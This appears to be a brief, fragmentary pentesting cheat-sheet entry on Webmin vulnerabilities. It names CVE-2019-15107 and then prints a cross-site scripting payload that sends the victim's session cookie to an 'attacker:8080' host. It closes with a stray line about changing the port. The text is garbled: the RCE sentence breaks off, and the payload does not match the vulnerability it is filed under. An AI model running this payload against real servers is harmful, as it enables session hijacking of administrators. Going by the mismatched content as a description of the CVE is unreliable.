Webmin Hacktricks Link

Webmin has a history of high-impact vulnerabilities. Always check for your specific version on Exploit-DB.

1. Unauthenticated Remote Code Execution (RCE)

The most famous example is CVE-2019-15107 (Webmin 1.890 to 1.920). A backdoor in the password_change.cgi

Execution:

<img src=x onerror="fetch('/sysinfo.cgi?xss=<script>new Image().src='http://attacker:8080/?'+document.cookie</script>')">

: Edit miniserv.conf to move away from port 10000.